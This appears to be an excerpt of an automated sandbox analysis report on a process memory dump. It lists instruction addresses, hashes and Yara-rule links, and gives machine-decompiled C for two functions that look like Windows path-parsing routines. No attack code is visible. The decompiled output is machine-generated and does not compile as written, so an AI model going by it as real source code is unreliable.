                        0x02bc604c
                        0x02bc604d
                        0x02bc6053
                        0x02bc6054
                        0x02bc6054
                        0x02bc6062
                        0x02bc6065
                        0x02bc6067
                        0x02bc606a
                        0x02bc6070
                        0x02bc6075
                        0x02bc6076
                        0x02bc6081
                        0x02bc6087
                        0x02bc6095
                        0x02bc6099
                        0x02bc609e
                        0x02bc60a4
                        0x02bc60ae
                        0x02bc60b0
                        0x02bc60b3
                        0x02bc60b6
                        0x02bc60b8
                        0x02bc60ba
                        0x02bc60ba
                        0x02bc60ba
                        0x02bc60ba
                        0x02bc60be
                        0x02bc60c0
                        0x02bc60c5
                        0x02bc60c5
                        0x02bc60c5
                        0x02bc60c6
                        0x02bc60cd
                        0x02bc6114
                        0x02bc60cf
                        0x02bc60cf
                        0x02bc60d4
                        0x02bc60d5
                        0x02bc60da
                        0x02bc60db
                        0x02bc60e1
                        0x02bc60e2
                        0x02bc60e8
                        0x02bc60f8
                        0x02bc60fd
                        0x02bc60fe
                        0x02bc6102
                        0x02bc6104
                        0x02bc6107
                        0x02bc6109
                        0x02bc610b
                        0x02bc610b
                        0x02bc610b
                        0x02bc610b
                        0x02bc610f
                        0x02bc610f
                        0x02bc6117
                        0x02bc611a
                        0x02bc611f
                        0x02bc6125
                        0x02bc6134
                        0x02bc6139
                        0x02bc613f
                        0x02bc6146
                        0x02bc6148
                        0x02bc614b
                        0x02bc614d
                        0x02bc614f
                        0x02bc614f
                        0x02bc614f
                        0x02bc614f
                        0x02bc6153
                        0x02bc6159
                        0x02bc6159
                        0x02bc615c
                        0x02bc6163
                        0x02bc6169
                        0x02bc616c
                        0x02bc6172
                        0x02bc6181
                        0x02bc6186
                        0x02bc6187
                        0x02bc618b
                        0x02bc6191
                        0x02bc6195
                        0x02bc61a3
                        0x02bc61bb
                        0x02bc61c0
                        0x02bc61c3
                        0x02bc61cc
                        0x02bc61d0
                        0x02bc61dc
                        0x02bc61de
                        0x02bc61e1
                        0x02bc61e4
                        0x02bc61e6
                        0x02bc61e8
                        0x02bc61e8
                        0x02bc61e8
                        0x02bc61e8
                        0x02bc61e6
                        0x02bc61ec
                        0x02bc61f3
                        0x02bc6203
                        0x02bc6209
                        0x02bc620a
                        0x02bc6216
                        0x02bc621d
                        0x02bc6227
                        0x02bc6241
                        0x02bc6246
                        0x02bc624c
                        0x02bc6257
                        0x02bc6259
                        0x02bc625c
                        0x02bc625e
                        0x02bc6260
                        0x02bc6260
                        0x02bc6260
                        0x02bc6260
                        0x02bc625e
                        0x02bc6264
                        0x02bc6267
                        0x02bc6269
                        0x02bc6315
                        0x02bc6315
                        0x02bc631b
                        0x02bc631e
                        0x02bc6324
                        0x02bc6327
                        0x02bc632f
                        0x02bc6330
                        0x02bc6333
                        0x02bc633a
                        0x02bc633c
                        0x02bc6335
                        0x02bc6335
                        0x02bc6335
                        0x02bc633f
                        0x02bc6342
                        0x02bc634c
                        0x02bc6352
                        0x02bc6355
                        0x02bc6355
                        0x02bc6359
                        0x00000000
                        0x02bc626f
                        0x02bc6275
                        0x02bc6275
                        0x02bc6278
                        0x02bc627e
                        0x02bc627e
                        0x02bc6281
                        0x02bc6287
                        0x02bc628d
                        0x02bc6298
                        0x02bc629c
                        0x02bc62a2
                        0x02bc629e
                        0x02bc629e
                        0x02bc629e
                        0x02bc62a7
                        0x02bc62a7
                        0x02bc62aa
                        0x02bc62b0
                        0x02bc62f0
                        0x02bc62f0
                        0x02bc62f2
                        0x02bc62f8
                        0x02bc62fd
                        0x02bc62b2
                        0x02bc62b2
                        0x02bc62b2
                        0x02bc62b5
                        0x02bc62dd
                        0x02bc62e2
                        0x02bc62e5
                        0x02bc62b7
                        0x02bc62b8
                        0x02bc62bb
                        0x02bc62bd
                        0x02bc62c0
                        0x02bc62c4
                        0x02bc62cd
                        0x02bc62cd
                        0x02bc62c0
                        0x02bc62bb
                        0x02bc62b5
                        0x02bc6302
                        0x02bc6303
                        0x02bc6305
                        0x02bc6305
                        0x02bc6305
                        0x02bc630c
                        0x02bc630c
                        0x00000000
                        0x02bc627e
                        0x02bc6269
                        0x02bc5eac
                        0x02bc5ebb
                        0x02bc5ebe
                        0x02bc5ecb
                        0x02bc5ecb
                        0x02bc5ece
                        0x02bc5ece
                        0x02bc5ed4
                        0x02bc5ed7
                        0x02bc5ed9
                        0x02bc5edb
                        0x02bc5edb
                        0x02bc5ee1
                        0x02bc5ee1
                        0x02bc5ee3
                        0x02bc5f20
                        0x02bc5f20
                        0x02bc5ee5
                        0x02bc5ee5
                        0x02bc5ee5
                        0x02bc5ee8
                        0x02bc5f11
                        0x02bc5f18
                        0x02bc5eea
                        0x02bc5eea
                        0x02bc5eed
                        0x02bc5ef2
                        0x02bc5ef8
                        0x02bc5efb
                        0x02bc5f0a
                        0x02bc5f0a
                        0x02bc5eed
                        0x02bc5ee8
                        0x02bc5f22
                        0x02bc5f28
                        0x00000000
                        0x00000000
                        0x02bc5f30
                        0x02bc5f31
                        0x02bc5f37
                        0x02bc5f3a
                        0x02bc5f3d
                        0x02bc5f44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc5f46
                        0x02bc5f48
                        0x02bc5f4d
                        0x00000000
                        0x02bc5f4d
                        0x02bc5dda
                        0x02bc5ddf
                        0x00000000
                        0x02bc5ddf
                        0x02bc5dd8
                        0x02bc5da7
                        0x02bc5da9
                        0x02bc5dac
                        0x02bc5dae
                        0x00000000
                        0x02bc5db4
                        0x02bc5db4
                        0x00000000
                        0x02bc5db4
                        0x02bc5dae
                        0x02bc5d88
                        0x02bc5d8d
                        0x02bc6363
                        0x02bc6369
                        0x02bc636a
                        0x02bc6370
                        0x02bc6372
                        0x02bc637a
                        0x02bc637b
                        0x02bc637d
                        0x00000000
                        0x00000000
                        0x02bc637f
                        0x02bc6385
                        0x00000000
                        0x02bc6385
                        0x02bc5d38
                        0x02bc5d3b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc5d3b
                        0x02bc5d27
                        0x02bc5d29
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc6360
                        0x00000000
                        0x02bc6360
                        0x02bc5c10
                        0x02bc5c10
                        0x02bc63da
                        0x02bc63e5
                        0x02bc63e5

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8540289a6accf637682ad350b3b3fa517869d00988de88e1b5365ea027515906
                        • Instruction ID: 82c5a0c2006e853b14ec6b2a43d4b067779e4d47dc108c2a873fb0dd343c9a52
                        • Opcode Fuzzy Hash: 8540289a6accf637682ad350b3b3fa517869d00988de88e1b5365ea027515906
                        • Instruction Fuzzy Hash: CF422875D10229CFDB24CF68C880BA9B7B5FF89304F2481EED959AB242D774A985CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B14120, Relevance: .4, Instructions: 444COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E02B14120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x2bed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E02B2F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E02B16E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L02B14620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E02B16E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M02B145F8))) {
												case 0:
													_v568 = 0x2ad1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x2ad11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L02B14620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E02B3F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E02B3F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E02AF52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E02B0EB70(1, 0x2be79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E02B0AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E02B395D0();
																			L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E02B3B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E02B33D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E02B3B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                        0x02b14128
                        0x02b14135
                        0x02b1413c
                        0x02b14141
                        0x02b14145
                        0x02b14147
                        0x02b1414e
                        0x02b14151
                        0x02b14159
                        0x02b1415c
                        0x02b14160
                        0x02b14164
                        0x02b14168
                        0x02b1416c
                        0x02b1417f
                        0x02b14181
                        0x02b1446a
                        0x02b1446a
                        0x02b1418c
                        0x02b14195
                        0x02b14199
                        0x02b14432
                        0x02b14439
                        0x02b1443d
                        0x02b14442
                        0x02b14447
                        0x00000000
                        0x02b1419f
                        0x02b141a3
                        0x02b141b1
                        0x02b141b9
                        0x02b141bd
                        0x02b145db
                        0x02b145db
                        0x00000000
                        0x02b141c3
                        0x02b141c3
                        0x02b141ce
                        0x02b141d4
                        0x02b5e138
                        0x02b5e13e
                        0x02b5e169
                        0x02b5e16d
                        0x02b5e19e
                        0x02b5e16f
                        0x02b5e16f
                        0x02b5e175
                        0x02b5e179
                        0x02b5e18f
                        0x02b5e193
                        0x00000000
                        0x02b5e199
                        0x00000000
                        0x02b5e199
                        0x02b5e193
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b141da
                        0x02b141da
                        0x02b141df
                        0x02b141e4
                        0x02b141ec
                        0x02b14203
                        0x02b14207
                        0x02b5e1fd
                        0x02b14222
                        0x02b14226
                        0x02b5e1f3
                        0x02b5e1f3
                        0x02b1422c
                        0x02b1422c
                        0x02b14233
                        0x02b5e1ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b14239
                        0x02b14239
                        0x02b14239
                        0x02b14239
                        0x02b14233
                        0x02b14226
                        0x02b141ee
                        0x02b141ee
                        0x02b141f4
                        0x02b14575
                        0x02b5e1b1
                        0x02b5e1b1
                        0x00000000
                        0x02b1457b
                        0x02b1457b
                        0x02b14582
                        0x02b5e1ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b14588
                        0x02b14588
                        0x02b1458c
                        0x02b5e1c4
                        0x02b5e1c4
                        0x00000000
                        0x02b14592
                        0x02b14592
                        0x02b14599
                        0x02b5e1be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b1459f
                        0x02b1459f
                        0x02b145a3
                        0x02b5e1d7
                        0x02b5e1e4
                        0x00000000
                        0x02b145a9
                        0x02b145a9
                        0x02b145b0
                        0x02b5e1d1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b145b6
                        0x02b145b6
                        0x02b145b6
                        0x00000000
                        0x02b145b6
                        0x02b145b0
                        0x02b145a3
                        0x02b14599
                        0x02b1458c
                        0x02b14582
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b141f4
                        0x02b1423e
                        0x02b14241
                        0x02b145c0
                        0x02b145c4
                        0x00000000
                        0x02b145ca
                        0x02b145ca
                        0x00000000
                        0x02b5e207
                        0x02b5e20f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b145d1
                        0x00000000
                        0x00000000
                        0x02b145ca
                        0x00000000
                        0x02b14247
                        0x02b14247
                        0x02b14247
                        0x02b14249
                        0x02b14249
                        0x02b14249
                        0x02b14251
                        0x02b14251
                        0x02b14257
                        0x02b1425f
                        0x02b1426e
                        0x02b14270
                        0x02b1427a
                        0x02b5e219
                        0x02b5e219
                        0x02b14280
                        0x02b14282
                        0x02b14456
                        0x02b145ea
                        0x00000000
                        0x02b145f0
                        0x02b5e223
                        0x00000000
                        0x02b5e223
                        0x02b1445c
                        0x02b1445c
                        0x00000000
                        0x02b1445c
                        0x00000000
                        0x02b14288
                        0x02b1428c
                        0x02b5e298
                        0x02b14292
                        0x02b14292
                        0x02b1429e
                        0x02b142a3
                        0x02b142a7
                        0x02b142ac
                        0x02b5e22d
                        0x02b142b2
                        0x02b142b2
                        0x02b142b9
                        0x02b142bc
                        0x02b142c2
                        0x02b142ca
                        0x02b142cd
                        0x02b142cd
                        0x02b142d4
                        0x02b1433f
                        0x02b1433f
                        0x02b142d6
                        0x02b142d6
                        0x02b142d9
                        0x02b142dd
                        0x02b142eb
                        0x02b5e23a
                        0x02b142f1
                        0x02b14305
                        0x02b1430d
                        0x02b14315
                        0x02b14318
                        0x02b1431f
                        0x02b14322
                        0x02b1432e
                        0x02b1433b
                        0x02b1433b
                        0x00000000
                        0x02b1432e
                        0x02b142eb
                        0x02b1434c
                        0x02b1434e
                        0x02b14352
                        0x02b14359
                        0x02b1435e
                        0x02b14361
                        0x02b1436e
                        0x02b1438a
                        0x02b1438e
                        0x02b14396
                        0x02b1439e
                        0x02b143a1
                        0x02b143ad
                        0x02b143bb
                        0x02b143bb
                        0x02b143ad
                        0x02b1436e
                        0x02b143bf
                        0x02b143c5
                        0x02b14463
                        0x02b14463
                        0x02b143ce
                        0x02b143d5
                        0x02b143d9
                        0x02b143df
                        0x02b14475
                        0x02b14479
                        0x02b14491
                        0x02b14491
                        0x02b14479
                        0x02b143e5
                        0x02b143eb
                        0x02b143f4
                        0x02b143f6
                        0x02b143f9
                        0x02b143fc
                        0x02b143ff
                        0x02b144e8
                        0x02b144ed
                        0x02b144f3
                        0x02b5e247
                        0x00000000
                        0x02b144f9
                        0x02b14504
                        0x02b14508
                        0x02b1450f
                        0x02b5e269
                        0x00000000
                        0x02b14515
                        0x02b14519
                        0x02b14531
                        0x02b14534
                        0x02b14537
                        0x02b1453e
                        0x02b14541
                        0x02b1454a
                        0x02b5e255
                        0x02b5e255
                        0x02b5e25b
                        0x02b5e25e
                        0x02b5e261
                        0x02b5e261
                        0x02b14555
                        0x02b14559
                        0x02b1455d
                        0x02b5e26d
                        0x02b5e270
                        0x02b5e274
                        0x02b5e27a
                        0x02b5e27d
                        0x02b5e28e
                        0x02b5e28e
                        0x02b14563
                        0x02b14563
                        0x02b14569
                        0x02b14569
                        0x00000000
                        0x02b1455d
                        0x02b1450f
                        0x00000000
                        0x02b144f3
                        0x02b143ff
                        0x02b14405
                        0x02b14405
                        0x02b14405
                        0x02b142ac
                        0x02b1428c
                        0x02b14282
                        0x02b14407
                        0x02b1440d
                        0x02b5e2af
                        0x02b5e2af
                        0x02b14413
                        0x02b14413
                        0x00000000
                        0x02b141d4
                        0x00000000
                        0x02b141c3
                        0x02b141bd
                        0x02b14415
                        0x02b14415
                        0x02b14416
                        0x02b14417
                        0x02b14429
                        0x02b1416e
                        0x02b1416e
                        0x02b14175
                        0x02b14498
                        0x02b1449f
                        0x02b5e12d
                        0x00000000
                        0x02b5e133
                        0x00000000
                        0x02b5e133
                        0x02b144a5
                        0x02b144a5
                        0x02b144aa
                        0x00000000
                        0x02b144bb
                        0x02b144ca
                        0x02b144d6
                        0x02b144d7
                        0x02b144d8
                        0x02b144e3
                        0x02b144e3
                        0x02b144aa
                        0x02b1417b
                        0x02b1417b
                        0x02b1417b
                        0x00000000
                        0x02b1417b
                        0x02b14175
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d32d1ef3a84acb86658233788bc98fad66d1e60775f98216df6bccd9a13bd3d2
                        • Instruction ID: c3284723922305e75560402e1f471cbe64be5b961224247573a9d351e472c8b4
                        • Opcode Fuzzy Hash: d32d1ef3a84acb86658233788bc98fad66d1e60775f98216df6bccd9a13bd3d2
                        • Instruction Fuzzy Hash: 49F16F705082518BC718CF19C480B3AB7F2FF88758F9489AEF896CB250E735D995CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B220A0, Relevance: .4, Instructions: 420COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E02B220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x2be8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E02B22EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E02B22EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E02AF58EC(_t240);
									_t221 =  *0x2be5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x2be5cac; // 0x16
							L7:
							if(_t133 != 0) {
